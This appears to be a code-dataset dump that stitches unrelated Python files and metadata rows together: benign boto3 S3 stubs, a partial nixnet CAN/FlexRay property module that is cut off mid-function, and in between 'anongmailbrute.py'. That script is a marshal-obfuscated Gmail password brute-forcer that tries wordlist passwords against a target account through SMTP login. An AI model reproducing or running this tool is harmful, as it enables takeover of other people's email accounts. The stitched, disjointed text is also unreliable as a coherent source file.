pass
def put_bucket_website(self, Bucket: str, WebsiteConfiguration: Dict):
pass
def put_object(self, Bucket: str, Key: str, ACL: str = None, Body: Union[bytes, IO] = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentLength: int = None, ContentMD5: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def put_object_acl(self, Bucket: str, Key: str, ACL: str = None, AccessControlPolicy: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, RequestPayer: str = None, VersionId: str = None) -> Dict:
pass
def put_object_legal_hold(self, Bucket: str, Key: str, LegalHold: Dict = None, RequestPayer: str = None, VersionId: str = None, ContentMD5: str = None) -> Dict:
pass
def put_object_lock_configuration(self, Bucket: str, ObjectLockConfiguration: Dict = None, RequestPayer: str = None, Token: str = None, ContentMD5: str = None) -> Dict:
pass
def put_object_retention(self, Bucket: str, Key: str, Retention: Dict = None, RequestPayer: str = None, VersionId: str = None, BypassGovernanceRetention: bool = None, ContentMD5: str = None) -> Dict:
pass
def put_object_tagging(self, Bucket: str, Key: str, Tagging: Dict, VersionId: str = None, ContentMD5: str = None) -> Dict:
pass
def put_public_access_block(self, Bucket: str, PublicAccessBlockConfiguration: Dict, ContentMD5: str = None):
pass
def restore_object(self, Bucket: str, Key: str, VersionId: str = None, RestoreRequest: Dict = None, RequestPayer: str = None) -> Dict:
pass
def select_object_content(self, Bucket: str, Key: str, Expression: str, ExpressionType: str, InputSerialization: Dict, OutputSerialization: Dict, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestProgress: Dict = None) -> Dict:
pass
def upload_file(self, Filename: str = None, Bucket: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def upload_fileobj(self, Fileobj: IO = None, Bucket: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def upload_part(self, Bucket: str, Key: str, PartNumber: int, UploadId: str, Body: Union[bytes, IO] = None, ContentLength: int = None, ContentMD5: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None) -> Dict:
pass
def upload_part_copy(self, Bucket: str, CopySource: Union[str, Dict], Key: str, PartNumber: int, UploadId: str, CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, CopySourceRange: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None) -> Dict:
pass
| 50.941558 | 1,113 | 0.699936 | 1,846 | 15,690 | 5.83857 | 0.107259 | 0.133791 | 0.107348 | 0.045927 | 0.833086 | 0.761922 | 0.700408 | 0.633234 | 0.536092 | 0.465949 | 0 | 0.001674 | 0.200446 | 15,690 | 307 | 1,114 | 51.107492 | 0.857473 | 0 | 0 | 0.471154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.471154 | false | 0.485577 | 0.052885 | 0 | 0.528846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
a9fde79420e358d4ec5ecc1ddc5d3aaeddf07ce9 | 4,066 | py | Python | anongmailbrute.py | PikriArt31/Gmail-Brute-Force-DSFS | 27a927bedc9103edf345bd8204f700fb3b0f820e | [
"MIT"
] | 11 | 2020-11-12T09:01:43.000Z | 2022-01-18T20:09:35.000Z | anongmailbrute.py | natelipus0x01/Gmail-Brute-Force-DSFS | 6a8a8669c6187e99f41fcb7c4eed2d764ec3335b | [
"MIT"
] | 1 | 2021-05-31T13:02:30.000Z | 2021-10-11T19:08:28.000Z | anongmailbrute.py | natelipus0x01/Gmail-Brute-Force-DSFS | 6a8a8669c6187e99f41fcb7c4eed2d764ec3335b | [
"MIT"
] | 12 | 2020-07-18T17:25:14.000Z | 2022-03-21T06:35:34.000Z | import marshal
exec(marshal.loads(''"c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\xe5\x00\x00\x00d\x00\x00Z\x00\x00d\x01\x00d\x02\x00l\x01\x00Z\x01\x00d\x01\x00d\x02\x00l\x02\x00Z\x02\x00d\x01\x00d\x02\x00l\x03\x00Z\x03\x00d\x01\x00d\x03\x00l\x03\x00m\x04\x00Z\x04\x00\x01e\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01e\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01Hd\x06\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHHd\x0c\x00GHd\r\x00GHe\x05\x00d\x0e\x00\x83\x01\x00Z\x06\x00e\x06\x00d\x0f\x00k\x02\x00r\xa5\x00e\x07\x00d\x10\x00\x83\x01\x00Z\x08\x00n\x11\x00e\x04\x00d\x04\x00\x83\x01\x00\x01e\t\x00\x83\x00\x00\x01e\n\x00e\x08\x00d\x11\x00\x83\x02\x00Z\x0b\x00e\x0b\x00j\x0c\x00\x83\x00\x00Z\r\x00d\x12\x00\x84\x00\x00Z\x0e\x00e\x0e\x00\x83\x00\x00\x01d\x02\x00S(\x13\x00\x00\x00s\x15\x00\x00\x00Creator : Anon6372098i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x06\x00\x00\x00systemt\x05\x00\x00\x00clears\x17\x00\x00\x00figlet GMAIL BRUTE DSFSs\x17\x00\x00\x00Creator : Anon6372098sa\x00\x00\x00You Tube : https://www.youtube.com/channel/UC6z-i5NX934RvX7BWr3MlJw (D4RK SYST3M F41LUR3 S33K3R)s*\x00\x00\x00Github : https://github.com/Anon6372098s!\x00\x00\x00Email : anon6372098@gmail.coms-\x00\x00\x00Team : D4RK SYST3M F41LUR3 S33K3R (DSFS)s0\x00\x00\x00Spesial : *Hari Sumpah Pemuda 28 Oktober 2018*s\x1c\x00\x00\x00[1] Start an Attack/Eksekusis\x08\x00\x00\x00[2] Exits\x0f\x00\x00\x00Choose/Pilih: >i\x01\x00\x00\x00s'\x00\x00\x00Your Wordlist Path/Tempat Wordlist Mu :t\x01\x00\x00\x00rc\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x04\x01\x00\x00d\x01\x00}\x00\x00t\x00\x00d\x02\x00\x83\x01\x00}\x01\x00t\x01\x00j\x02\x00d\x03\x00d\x04\x00\x83\x02\x00}\x02\x00|\x02\x00j\x03\x00\x83\x00\x00\x01x\xcf\x00t\x04\x00D]\xc7\x00}\x03\x00|\x00\x00d\x05\x00\x17}\x00\x00t\x05\x00|\x00\x00\x83\x01\x00d\x06\x00\x17t\x05\x00t\x06\x00t\x04\x00\x83\x01\x00\x83\x01\x00\x17GHy8\x00|\x02\x00j\x07\x00|\x01\x00|\x03\x00\x83\x02\x00\x01t\x08\x00d\x07\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01d\x08\x00GHd\t\x00|\x03\x00\x17d\n\x00\x17GHPWq5\x00\x04t\x01\x00j\n\x00k\n\x00r\xfb\x00\x01}\x04\x00\x01t\x05\x00|\x04\x00\x83\x01\x00}\x05\x00|\x05\x00d\x0b\x00\x19d\x0c\x00k\x02\x00r\xef\x00t\x08\x00d\x07\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01d\t\x00|\x03\x00\x17d\n\x00\x17GHPq\xfc\x00d\r\x00|\x03\x00\x17GHq5\x00Xq5\x00Wd\x00\x00S(\x0e\x00\x00\x00Ni\x00\x00\x00\x00s\x1c\x00\x00\x00Target E-mail (@gmail.com) :s\x0e\x00\x00\x00smtp.gmail.comi\xd1\x01\x00\x00i\x01\x00\x00\x00t\x01\x00\x00\x00/R\x01\x00\x00\x00s\x01\x00\x00\x00\ns\x1d\x00\x00\x00[+] Password akun ditemukan :s\x08\x00\x00\x00 ^_^i\x0e\x00\x00\x00t\x01\x00\x00\x00<s!\x00\x00\x00[!] Password yang dicoba... => (\x0b\x00\x00\x00t\t\x00\x00\x00raw_inputt\x07\x00\x00\x00smtplibt\x08\x00\x00\x00SMTP_SSLt\x04\x00\x00\x00ehlot\t\x00\x00\x00pass_listt\x03\x00\x00\x00strt\x03\x00\x00\x00lent\x05\x00\x00\x00loginR\x00\x00\x00\x00t\x04\x00\x00\x00maint\x17\x00\x00\x00SMTPAuthenticationError(\x06\x00\x00\x00t\x01\x00\x00\x00it\t\x00\x00\x00user_namet\x06\x00\x00\x00servert\x08\x00\x00\x00passwordt\x01\x00\x00\x00et\x05\x00\x00\x00error(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x0c\x00\x00\x00\x1e\x00\x00\x00s,\x00\x00\x00\x00\x01\x06\x01\x0c\x01\x12\x01\n\x01\r\x01\n\x01\x1f\x01\x03\x01\x10\x01\n\x01\x07\x01\x05\x01\r\x01\x05\x01\x12\x01\x0c\x01\x10\x01\n\x01\x07\x01\r\x02\x04\x02(\x0f\x00\x00\x00t\x07\x00\x00\x00__doc__R\x06\x00\x00\x00t\x03\x00\x00\x00syst\x02\x00\x00\x00osR\x00\x00\x00\x00t\x05\x00\x00\x00inputt\x06\x00\x00\x00optionR\x05\x00\x00\x00t\t\x00\x00\x00file_patht\x04\x00\x00\x00exitt\x04\x00\x00\x00opent\t\x00\x00\x00pass_filet\t\x00\x00\x00readlinesR\t\x00\x00\x00R\x0c\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s2\x00\x00\x00\x06\x02\x0c\x01\x0c\x01\x0c\x01\x10\x02\r\x01\r\x01\x01\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x01\x02\x05\x01\x05\x01\x0c\x01\x0c\x01\x0f\x02\n\x01\x07\x01\x0f\x01\x0c\x01\t\x19"'')) | 2,033 | 4,051 | 0.76119 | 865 | 4,066 | 3.565318 | 0.202312 | 0.270428 | 0.142996 | 0.093385 | 0.246109 | 0.178988 | 0.136835 | 0.098573 | 0.07393 | 0.07393 | 0 | 0.374969 | 0.019429 | 4,066 | 2 | 4,051 | 2,033 | 0.398545 | 0 | 0 | 0 | 0 | 0.5 | 0.989427 | 0.894517 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 12 |
e7296aabaf1b4cbd018d6d9915d44a3dcaf1e924 | 104,265 | py | Python | nixnet/_props.py | ni-ldp/nixnet-python | 83f30c5b44098de0dc4828838e263b7be0866228 | [
"MIT"
] | 16 | 2017-06-14T19:44:45.000Z | 2022-02-06T15:14:52.000Z | nixnet/_props.py | ni-ldp/nixnet-python | 83f30c5b44098de0dc4828838e263b7be0866228 | [
"MIT"
] | 216 | 2017-06-15T16:41:10.000Z | 2021-09-23T23:00:50.000Z | nixnet/_props.py | ni-ldp/nixnet-python | 83f30c5b44098de0dc4828838e263b7be0866228 | [
"MIT"
] | 23 | 2017-06-14T22:51:08.000Z | 2022-03-03T03:04:40.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import typing # NOQA: F401
from nixnet import _cconsts
from nixnet import _cprops
def get_session_application_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_APPLICATION_PROTOCOL,
)
def get_session_auto_start(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_AUTO_START,
)
def set_session_auto_start(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_AUTO_START,
value,
)
def get_session_cluster_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_SESSION_CLUSTER_NAME,
)
def get_session_database_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_SESSION_DATABASE_NAME,
)
def get_session_list(
ref, # type: int
):
# type: (...) -> typing.Iterable[typing.Text]
return _cprops.get_session_string_array(
ref,
_cconsts.NX_PROP_SESSION_LIST,
)
def get_session_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_MODE,
)
def get_session_num_frames(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_NUM_FRAMES,
)
def get_session_num_in_list(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_NUM_IN_LIST,
)
def get_session_num_pend(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_NUM_PEND,
)
def get_session_num_unused(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_NUM_UNUSED,
)
def get_session_payld_len_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_PAYLD_LEN_MAX,
)
def get_session_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_PROTOCOL,
)
def get_session_queue_size(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_QUEUE_SIZE,
)
def set_session_queue_size(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_QUEUE_SIZE,
value,
)
def get_session_resamp_rate(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_session_f64(
ref,
_cconsts.NX_PROP_SESSION_RESAMP_RATE,
)
def set_session_resamp_rate(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_session_f64(
ref,
_cconsts.NX_PROP_SESSION_RESAMP_RATE,
value,
)
def get_session_intf_baud_rate(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_BAUD_RATE,
)
def set_session_intf_baud_rate(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_BAUD_RATE,
value,
)
def get_session_intf_baud_rate64(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u64(
ref,
_cconsts.NX_PROP_SESSION_INTF_BAUD_RATE64,
)
def set_session_intf_baud_rate64(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u64(
ref,
_cconsts.NX_PROP_SESSION_INTF_BAUD_RATE64,
value,
)
def get_session_intf_bus_err_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_BUS_ERR_TO_IN_STRM,
)
def set_session_intf_bus_err_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_BUS_ERR_TO_IN_STRM,
value,
)
def get_session_intf_echo_tx(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_ECHO_TX,
)
def set_session_intf_echo_tx(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_ECHO_TX,
value,
)
def get_session_intf_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_session_string(
ref,
_cconsts.NX_PROP_SESSION_INTF_NAME,
)
def get_session_intf_out_strm_list(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_ref_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_OUT_STRM_LIST,
)
def set_session_intf_out_strm_list(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_session_ref_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_OUT_STRM_LIST,
value,
)
def get_session_intf_out_strm_timng(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_OUT_STRM_TIMNG,
)
def set_session_intf_out_strm_timng(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_OUT_STRM_TIMNG,
value,
)
def get_session_intf_start_trig_to_in_strm(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_START_TRIG_TO_IN_STRM,
)
def set_session_intf_start_trig_to_in_strm(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_START_TRIG_TO_IN_STRM,
value,
)
def set_session_intf_can_ext_tcvr_config(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_EXT_TCVR_CONFIG,
value,
)
def get_session_intf_can_lstn_only(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_LSTN_ONLY,
)
def set_session_intf_can_lstn_only(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_LSTN_ONLY,
value,
)
def get_session_intf_can_pend_tx_order(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_PEND_TX_ORDER,
)
def set_session_intf_can_pend_tx_order(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_PEND_TX_ORDER,
value,
)
def get_session_intf_can_sing_shot(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_SING_SHOT,
)
def set_session_intf_can_sing_shot(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_SING_SHOT,
value,
)
def get_session_intf_can_term(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TERM,
)
def set_session_intf_can_term(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TERM,
value,
)
def get_session_intf_can_tcvr_state(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TCVR_STATE,
)
def set_session_intf_can_tcvr_state(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TCVR_STATE,
value,
)
def get_session_intf_can_tcvr_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TCVR_TYPE,
)
def set_session_intf_can_tcvr_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TCVR_TYPE,
value,
)
def get_session_intf_can_out_strm_list_by_id(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_OUT_STRM_LIST_BY_ID,
)
def set_session_intf_can_out_strm_list_by_id(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_session_u32_array(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_OUT_STRM_LIST_BY_ID,
value,
)
def get_session_intf_can_io_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_IO_MODE,
)
def get_session_intf_can_fd_baud_rate(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_BAUD_RATE,
)
def set_session_intf_can_fd_baud_rate(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_BAUD_RATE,
value,
)
def get_session_intf_can_fd_baud_rate64(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u64(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_BAUD_RATE64,
)
def set_session_intf_can_fd_baud_rate64(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u64(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_BAUD_RATE64,
value,
)
def get_session_intf_can_tx_io_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TX_IO_MODE,
)
def set_session_intf_can_tx_io_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_TX_IO_MODE,
value,
)
def get_session_intf_can_fd_iso_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_ISO_MODE,
)
def set_session_intf_can_fd_iso_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_CAN_FD_ISO_MODE,
value,
)
def get_session_intf_flex_ray_acc_start_rng(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ACC_START_RNG,
)
def set_session_intf_flex_ray_acc_start_rng(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ACC_START_RNG,
value,
)
def get_session_intf_flex_ray_alw_hlt_clk(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ALW_HLT_CLK,
)
def set_session_intf_flex_ray_alw_hlt_clk(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ALW_HLT_CLK,
value,
)
def get_session_intf_flex_ray_alw_pass_act(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ALW_PASS_ACT,
)
def set_session_intf_flex_ray_alw_pass_act(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_ALW_PASS_ACT,
value,
)
def get_session_intf_flex_ray_auto_aslp_whn_stp(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_AUTO_ASLP_WHN_STP,
)
def set_session_intf_flex_ray_auto_aslp_whn_stp(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_AUTO_ASLP_WHN_STP,
value,
)
def get_session_intf_flex_ray_clst_drift_dmp(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_CLST_DRIFT_DMP,
)
def set_session_intf_flex_ray_clst_drift_dmp(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_CLST_DRIFT_DMP,
value,
)
def get_session_intf_flex_ray_coldstart(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_session_bool(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_COLDSTART,
)
def get_session_intf_flex_ray_dec_corr(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DEC_CORR,
)
def set_session_intf_flex_ray_dec_corr(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DEC_CORR,
value,
)
def get_session_intf_flex_ray_delay_comp_a(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DELAY_COMP_A,
)
def set_session_intf_flex_ray_delay_comp_a(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DELAY_COMP_A,
value,
)
def get_session_intf_flex_ray_delay_comp_b(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DELAY_COMP_B,
)
def set_session_intf_flex_ray_delay_comp_b(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_DELAY_COMP_B,
value,
)
def get_session_intf_flex_ray_key_slot_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_KEY_SLOT_ID,
)
def set_session_intf_flex_ray_key_slot_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_KEY_SLOT_ID,
value,
)
def get_session_intf_flex_ray_latest_tx(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_LATEST_TX,
)
def get_session_intf_flex_ray_list_timo(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_LIST_TIMO,
)
def set_session_intf_flex_ray_list_timo(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_LIST_TIMO,
value,
)
def get_session_intf_flex_ray_mac_init_off_a(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAC_INIT_OFF_A,
)
def set_session_intf_flex_ray_mac_init_off_a(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAC_INIT_OFF_A,
value,
)
def get_session_intf_flex_ray_mac_init_off_b(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAC_INIT_OFF_B,
)
def set_session_intf_flex_ray_mac_init_off_b(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MAC_INIT_OFF_B,
value,
)
def get_session_intf_flex_ray_mic_init_off_a(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MIC_INIT_OFF_A,
)
def set_session_intf_flex_ray_mic_init_off_a(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MIC_INIT_OFF_A,
value,
)
def get_session_intf_flex_ray_mic_init_off_b(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MIC_INIT_OFF_B,
)
def set_session_intf_flex_ray_mic_init_off_b(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_session_u32(
ref,
_cconsts.NX_PROP_SESSION_INTF_FLEX_RAY_MIC_INIT_OFF_B,
value,
)
def get_session_intf_flex_ray_max_drift(
ref, # type: int
):
